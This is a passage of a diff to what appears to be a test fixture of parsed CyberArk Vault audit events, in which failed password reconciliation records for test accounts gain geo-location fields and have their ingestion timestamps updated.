\u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:46:13\",\"IsoTimestamp\":\"2021-03-14T13:46:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\",\"ExtraDetails\":\"address=67.43.156.15;username=testark;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", @@ -334,6 +361,15 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, @@ -415,7 +451,7 @@ "event": { "severity": 7, "reason": "Parameter Reconcile account is mandatory but has an empty value or is not defined", - "ingested": "2021-12-09T13:37:08.403084500Z", + "ingested": "2021-12-14T14:42:37.331272134Z", "original": "\u003c7\u003e1 2021-03-14T14:49:11Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 07:49:11\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T14:49:11Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=3;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"3\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615733350\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 07:49:11\",\"IsoTimestamp\":\"2021-03-14T14:49:11Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=3;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"3\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615733350\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", @@ -444,6 +480,15 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, @@ -525,7 +570,7 @@ "event": { "severity": 7, "reason": "Parameter Reconcile account is mandatory but has an empty value or is not defined", - "ingested": "2021-12-09T13:37:08.403089800Z", + "ingested": "2021-12-14T14:42:37.331272528Z", "original": "\u003c7\u003e1 2021-03-15T10:12:18Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:12:18\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:12:18Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=4;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"4\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615803137\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:12:18\",\"IsoTimestamp\":\"2021-03-15T10:12:18Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=4;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"4\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615803137\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", @@ -554,6 +599,15 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, @@ -634,7 +688,7 @@ "event": { "severity": 7, "reason": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", - "ingested": "2021-12-09T13:37:08.403095100Z", + "ingested": "2021-12-14T14:42:37.331272925Z", "original": "\u003c7\u003e1 2021-03-15T10:12:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:12:19\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:12:19Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=1;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615803137\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:12:19\",\"IsoTimestamp\":\"2021-03-15T10:12:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=1;username=testark;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615803137\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", @@ -663,6 +717,15 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, @@ -745,7 +808,7 @@ "event": { "severity": 7, "reason": "Parameter Reconcile account is mandatory but has an empty value or is not defined", - "ingested": "2021-12-09T13:37:08.403100500Z", + "ingested": "2021-12-14T14:42:37.331273308Z", "original": "\u003c7\u003e1 2021-03-15T12:57:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 05:57:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T12:57:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=5;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"(CPM)MaxRetries\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"5\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615813031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 05:57:13\",\"IsoTimestamp\":\"2021-03-15T12:57:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=5;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password 